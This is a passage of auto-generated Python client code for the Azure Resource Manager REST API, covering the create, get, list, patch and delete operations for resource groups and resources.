query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'PUT'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
resource_group_value = {}
request_doc = resource_group_value
resource_group_value['location'] = parameters.location
if parameters.properties is not None:
resource_group_value['properties'] = json.loads(parameters.properties)
if parameters.tags is not None:
tags_dictionary = {}
for tags_key in parameters.tags:
tags_value = parameters.tags[tags_key]
tags_dictionary[tags_key] = tags_value
resource_group_value['tags'] = tags_dictionary
if parameters.provisioning_state is not None:
resource_group_value['provisioningState'] = parameters.provisioning_state
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = len(request_content)
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 201:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 201:
response_content = body
result = ResourceGroupCreateOrUpdateResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
resource_group_instance = ResourceGroupExtended(tags={})
result.resource_group = resource_group_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
resource_group_instance.id = id_instance
name_value = response_doc.get('name', None)
if name_value is not None:
name_instance = name_value
resource_group_instance.name = name_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_group_instance.provisioning_state = provisioning_state_instance
location_value = response_doc.get('location', None)
if location_value is not None:
location_instance = location_value
resource_group_instance.location = location_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_group_instance.properties = properties_instance
tags_sequence_element = response_doc.get('tags', None)
if tags_sequence_element is not None:
for property in tags_sequence_element:
tags_key2 = property
tags_value2 = tags_sequence_element[property]
resource_group_instance.tags[tags_key2] = tags_value2
provisioning_state_value2 = response_doc.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_group_instance.provisioning_state = provisioning_state_instance2
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def delete(self, resource_group_name):
"""
Delete resource group and all of its resources.
Args:
resource_group_name (string): The name of the resource group to be
deleted. The name is case insensitive.
Returns:
AzureOperationResponse: A standard service response including an HTTP
status code and request ID.
"""
client2 = self.client
response = client2.resource_groups.begin_deleting(resource_group_name)
result = client2.get_long_running_operation_status(response.operation_status_link)
delay_in_seconds = response.retry_after
if delay_in_seconds == 0:
delay_in_seconds = 30
if client2.long_running_operation_initial_timeout >= 0:
delay_in_seconds = client2.long_running_operation_initial_timeout
while (result.status != OperationStatus.in_progress) == False:
time.sleep(delay_in_seconds)
result = client2.get_long_running_operation_status(response.operation_status_link)
delay_in_seconds = result.retry_after
if delay_in_seconds == 0:
delay_in_seconds = 15
if client2.long_running_operation_retry_timeout >= 0:
delay_in_seconds = client2.long_running_operation_retry_timeout
return result
def get(self, resource_group_name):
"""
Get a resource group.
Args:
resource_group_name (string): The name of the resource group to get.
The name is case insensitive.
Returns:
ResourceGroupGetResult: Resource group information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceGroupGetResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
resource_group_instance = ResourceGroupExtended(tags={})
result.resource_group = resource_group_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
resource_group_instance.id = id_instance
name_value = response_doc.get('name', None)
if name_value is not None:
name_instance = name_value
resource_group_instance.name = name_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_group_instance.provisioning_state = provisioning_state_instance
location_value = response_doc.get('location', None)
if location_value is not None:
location_instance = location_value
resource_group_instance.location = location_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_group_instance.properties = properties_instance
tags_sequence_element = response_doc.get('tags', None)
if tags_sequence_element is not None:
for property in tags_sequence_element:
tags_key = property
tags_value = tags_sequence_element[property]
resource_group_instance.tags[tags_key] = tags_value
provisioning_state_value2 = response_doc.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_group_instance.provisioning_state = provisioning_state_instance2
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list(self, parameters):
"""
Gets a collection of resource groups.
Args:
parameters (ResourceGroupListParameters): Query parameters. If null is
passed returns all resource groups.
Returns:
ResourceGroupListResult: List of resource groups.
"""
# Validate
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups'
query_parameters = []
odata_filter = []
if parameters is not None and parameters.tag_name is not None:
odata_filter.append('tagname eq \'' + quote(parameters.tag_name) + '\'')
if parameters is not None and parameters.tag_value is not None:
odata_filter.append('tagvalue eq \'' + quote(parameters.tag_value) + '\'')
if len(odata_filter) > 0:
query_parameters.append('$filter=' + ' and '.join(odata_filter))
if parameters is not None and parameters.top is not None:
query_parameters.append('$top=' + quote(str(parameters.top)))
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceGroupListResult(resource_groups=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
resource_group_json_format_instance = ResourceGroupExtended(tags={})
result.resource_groups.append(resource_group_json_format_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
resource_group_json_format_instance.id = id_instance
name_value = value_value.get('name', None)
if name_value is not None:
name_instance = name_value
resource_group_json_format_instance.name = name_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_group_json_format_instance.provisioning_state = provisioning_state_instance
location_value = value_value.get('location', None)
if location_value is not None:
location_instance = location_value
resource_group_json_format_instance.location = location_instance
properties_value2 = value_value.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_group_json_format_instance.properties = properties_instance
tags_sequence_element = value_value.get('tags', None)
if tags_sequence_element is not None:
for property in tags_sequence_element:
tags_key = property
tags_value = tags_sequence_element[property]
resource_group_json_format_instance.tags[tags_key] = tags_value
provisioning_state_value2 = value_value.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_group_json_format_instance.provisioning_state = provisioning_state_instance2
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list_next(self, next_link):
"""
Get a list of deployments.
Args:
next_link (string): NextLink from the previous successful call to List
operation.
Returns:
ResourceGroupListResult: List of resource groups.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceGroupListResult(resource_groups=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
resource_group_json_format_instance = ResourceGroupExtended(tags={})
result.resource_groups.append(resource_group_json_format_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
resource_group_json_format_instance.id = id_instance
name_value = value_value.get('name', None)
if name_value is not None:
name_instance = name_value
resource_group_json_format_instance.name = name_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_group_json_format_instance.provisioning_state = provisioning_state_instance
location_value = value_value.get('location', None)
if location_value is not None:
location_instance = location_value
resource_group_json_format_instance.location = location_instance
properties_value2 = value_value.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_group_json_format_instance.properties = properties_instance
tags_sequence_element = value_value.get('tags', None)
if tags_sequence_element is not None:
for property in tags_sequence_element:
tags_key = property
tags_value = tags_sequence_element[property]
resource_group_json_format_instance.tags[tags_key] = tags_value
provisioning_state_value2 = value_value.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_group_json_format_instance.provisioning_state = provisioning_state_instance2
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def patch(self, resource_group_name, parameters):
"""
Resource groups can be updated through a simple PATCH operation to a
group address. The format of the request is the same as that for
creating a resource groups, though if a field is unspecified current
value will be carried over.
Args:
resource_group_name (string): The name of the resource group to be
created or updated. The name is case insensitive.
parameters (ResourceGroup): Parameters supplied to the update state
resource group service operation.
Returns:
ResourceGroupPatchResult: Resource group information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if parameters is None:
raise ValueError('parameters cannot be None.')
if parameters.location is None:
raise ValueError('parameters.location cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'PATCH'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
resource_group_value = {}
request_doc = resource_group_value
resource_group_value['location'] = parameters.location
if parameters.properties is not None:
resource_group_value['properties'] = json.loads(parameters.properties)
if parameters.tags is not None:
tags_dictionary = {}
for tags_key in parameters.tags:
tags_value = parameters.tags[tags_key]
tags_dictionary[tags_key] = tags_value
resource_group_value['tags'] = tags_dictionary
if parameters.provisioning_state is not None:
resource_group_value['provisioningState'] = parameters.provisioning_state
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = len(request_content)
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceGroupPatchResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
resource_group_instance = ResourceGroupExtended(tags={})
result.resource_group = resource_group_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
resource_group_instance.id = id_instance
name_value = response_doc.get('name', None)
if name_value is not None:
name_instance = name_value
resource_group_instance.name = name_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_group_instance.provisioning_state = provisioning_state_instance
location_value = response_doc.get('location', None)
if location_value is not None:
location_instance = location_value
resource_group_instance.location = location_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_group_instance.properties = properties_instance
tags_sequence_element = response_doc.get('tags', None)
if tags_sequence_element is not None:
for property in tags_sequence_element:
tags_key2 = property
tags_value2 = tags_sequence_element[property]
resource_group_instance.tags[tags_key2] = tags_value2
provisioning_state_value2 = response_doc.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_group_instance.provisioning_state = provisioning_state_instance2
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
class ResourceOperations(object):
"""
Operations for managing resources.
__NOTE__: An instance of this class is automatically created for an
instance of the [ResourceManagementClient]
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the
Microsoft.Azure.Management.Resources.ResourceManagementClient.
"""
return self._client
def check_existence(self, resource_group_name, identity):
"""
Checks whether resource exists.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
identity (ResourceIdentity): Resource identity.
Returns:
ResourceExistsResult: Resource group information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if identity is None:
raise ValueError('identity cannot be None.')
if identity.resource_name is None:
raise ValueError('identity. cannot be None.')
if identity.resource_provider_api_version is None:
raise ValueError('identity. cannot be None.')
if identity.resource_provider_namespace is None:
raise ValueError('identity. cannot be None.')
if identity.resource_type is None:
raise ValueError('identity. cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/providers/'
url = url + quote(identity.resource_provider_namespace)
url = url + '/'
if identity.parent_resource_path is not None:
url = url + identity.parent_resource_path
url = url + '/'
url = url + identity.resource_type
url = url + '/'
url = url + quote(identity.resource_name)
query_parameters = []
query_parameters.append('api-version=' + quote(identity.resource_provider_api_version))
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 404:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = ResourceExistsResult()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
if status_code == 200:
result.exists = True
else:
result.exists = False
return result
def create_or_update(self, resource_group_name, identity, parameters):
"""
Create a resource.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
identity (ResourceIdentity): Resource identity.
parameters (GenericResource): Create or update resource parameters.
Returns:
ResourceCreateOrUpdateResult: Resource information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if identity is None:
raise ValueError('identity cannot be None.')
if identity.resource_name is None:
raise ValueError('identity. cannot be None.')
if identity.resource_provider_api_version is None:
raise ValueError('identity. cannot be None.')
if identity.resource_provider_namespace is None:
raise ValueError('identity. cannot be None.')
if identity.resource_type is None:
raise ValueError('identity. cannot be None.')
if parameters is None:
raise ValueError('parameters cannot be None.')
if parameters.location is None:
raise ValueError('parameters.location cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/providers/'
url = url + quote(identity.resource_provider_namespace)
url = url + '/'
if identity.parent_resource_path is not None:
url = url + identity.parent_resource_path
url = url + '/'
url = url + identity.resource_type
url = url + '/'
url = url + quote(identity.resource_name)
query_parameters = []
query_parameters.append('api-version=' + quote(identity.resource_provider_api_version))
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'PUT'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
generic_resource_value = {}
request_doc = generic_resource_value
if parameters.properties is not None:
generic_resource_value['properties'] = json.loads(parameters.properties)
if parameters.provisioning_state is not None:
generic_resource_value['provisioningState'] = parameters.provisioning_state
if parameters.plan is not None:
plan_value = {}
generic_resource_value['plan'] = plan_value
if parameters.plan.name is not None:
plan_value['name'] = parameters.plan.name
if parameters.plan.publisher is not None:
plan_value['publisher'] = parameters.plan.publisher
if parameters.plan.product is not None:
plan_value['product'] = parameters.plan.product
if parameters.plan.promotion_code is not None:
plan_value['promotionCode'] = parameters.plan.promotion_code
generic_resource_value['location'] = parameters.location
if parameters.tags is not None:
tags_dictionary = {}
for tags_key in parameters.tags:
tags_value = parameters.tags[tags_key]
tags_dictionary[tags_key] = tags_value
generic_resource_value['tags'] = tags_dictionary
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = len(request_content)
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 201:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 201:
response_content = body
result = ResourceCreateOrUpdateResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
resource_instance = GenericResourceExtended(tags={})
result.resource = resource_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_instance.provisioning_state = provisioning_state_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_instance.properties = properties_instance
provisioning_state_value2 = response_doc.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_instance.provisioning_state = provisioning_state_instance2
plan_value2 = response_doc.get('plan', None)
if plan_value2 is not None:
plan_instance = Plan()
resource_instance.plan = plan_instance
name_value = plan_value2.get('name', None)
if name_value is not None:
name_instance = name_value
plan_instance.name = name_instance
publisher_value = plan_value2.get('publisher', None)
if publisher_value is not None:
publisher_instance = publisher_value
plan_instance.publisher = publisher_instance
product_value = plan_value2.get('product', None)
if product_value is not None:
product_instance = product_value
plan_instance.product = product_instance
promotion_code_value = plan_value2.get('promotionCode', None)
if promotion_code_value is not None:
promotion_code_instance = promotion_code_value
plan_instance.promotion_code = promotion_code_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
resource_instance.id = id_instance
name_value2 = response_doc.get('name', None)
if name_value2 is not None:
name_instance2 = name_value2
resource_instance.name = name_instance2
type_value = response_doc.get('type', None)
if type_value is not None:
type_instance = type_value
resource_instance.type = type_instance
location_value = response_doc.get('location', None)
if location_value is not None:
location_instance = location_value
resource_instance.location = location_instance
tags_sequence_element = response_doc.get('tags', None)
if tags_sequence_element is not None:
for property in tags_sequence_element:
tags_key2 = property
tags_value2 = tags_sequence_element[property]
resource_instance.tags[tags_key2] = tags_value2
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def delete(self, resource_group_name, identity):
"""
Delete resource and all of its resources.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
identity (ResourceIdentity): Resource identity.
Returns:
AzureOperationResponse: A standard service response including an HTTP
status code and request ID.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if identity is None:
raise ValueError('identity cannot be None.')
if identity.resource_name is None:
raise ValueError('identity. cannot be None.')
if identity.resource_provider_api_version is None:
raise ValueError('identity. cannot be None.')
if identity.resource_provider_namespace is None:
raise ValueError('identity. cannot be None.')
if identity.resource_type is None:
raise ValueError('identity. cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/providers/'
url = url + quote(identity.resource_provider_namespace)
url = url + '/'
if identity.parent_resource_path is not None:
url = url + identity.parent_resource_path
url = url + '/'
url = url + identity.resource_type
url = url + '/'
url = url + quote(identity.resource_name)
query_parameters = []
query_parameters.append('api-version=' + quote(identity.resource_provider_api_version))
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'DELETE'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 202 and status_code != 204:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = AzureOperationResponse()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def get(self, resource_group_name, identity):
"""
Returns a resource belonging to a resource group.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
identity (ResourceIdentity): Resource identity.
Returns:
ResourceGetResult: Resource information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if identity is None:
raise ValueError('identity cannot be None.')
if identity.resource_name is None:
raise ValueError('identity. cannot be None.')
if identity.resource_provider_api_version is None:
raise ValueError('identity. cannot be None.')
if identity.resource_provider_namespace is None:
raise ValueError('identity. cannot be None.')
if identity.resource_type is None:
raise ValueError('identity. cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/providers/'
url = url + quote(identity.resource_provider_namespace)
url = url + '/'
if identity.parent_resource_path is not None:
url = url + identity.parent_resource_path
url = url + '/'
url = url + identity.resource_type
url = url + '/'
url = url + quote(identity.resource_name)
query_parameters = []
query_parameters.append('api-version=' + quote(identity.resource_provider_api_version))
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 204:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 204:
response_content = body
result = ResourceGetResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
resource_instance = GenericResourceExtended(tags={})
result.resource = resource_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_instance.provisioning_state = provisioning_state_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_instance.properties = properties_instance
provisioning_state_value2 = response_doc.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_instance.provisioning_state = provisioning_state_instance2
plan_value = response_doc.get('plan', None)
if plan_value is not None:
plan_instance = Plan()
resource_instance.plan = plan_instance
name_value = plan_value.get('name', None)
if name_value is not None:
name_instance = name_value
plan_instance.name = name_instance
publisher_value = plan_value.get('publisher', None)
if publisher_value is not None:
publisher_instance = publisher_value
plan_instance.publisher = publisher_instance
product_value = plan_value.get('product', None)
if product_value is not None:
product_instance = product_value
plan_instance.product = product_instance
promotion_code_value = plan_value.get('promotionCode', None)
if promotion_code_value is not None:
promotion_code_instance = promotion_code_value
plan_instance.promotion_code = promotion_code_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
resource_instance.id = id_instance
name_value2 = response_doc.get('name', None)
if name_value2 is not None:
name_instance2 = name_value2
resource_instance.name = name_instance2
type_value = response_doc.get('type', None)
if type_value is not None:
type_instance = type_value
resource_instance.type = type_instance
location_value = response_doc.get('location', None)
if location_value is not None:
location_instance = location_value
resource_instance.location = location_instance
tags_sequence_element = response_doc.get('tags', None)
if tags_sequence_element is not None:
for property in tags_sequence_element:
tags_key = property
tags_value = tags_sequence_element[property]
resource_instance.tags[tags_key] = tags_value
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list(self, parameters):
"""
Get all of the resources under a subscription.
Args:
parameters (ResourceListParameters): Query parameters. If null is
passed returns all resource groups.
Returns:
ResourceListResult: List of resource groups.
"""
# Validate
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/'
if parameters is not None and parameters.resource_group_name is not None:
url = url + 'resourceGroups/' + quote(parameters.resource_group_name) + '/'
url = url + 'resources'
query_parameters = []
odata_filter = []
if parameters is not None and parameters.resource_type is not None:
odata_filter.append('resourceType eq \'' + quote(parameters.resource_type) + '\'')
if parameters is not None and parameters.tag_name is not None:
odata_filter.append('tagname eq \'' + quote(parameters.tag_name) + '\'')
if parameters is not None and parameters.tag_value is not None:
odata_filter.append('tagvalue eq \'' + quote(parameters.tag_value) + '\'')
if len(odata_filter) > 0:
query_parameters.append('$filter=' + ' and '.join(odata_filter))
if parameters is not None and parameters.top is not None:
query_parameters.append('$top=' + quote(str(parameters.top)))
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
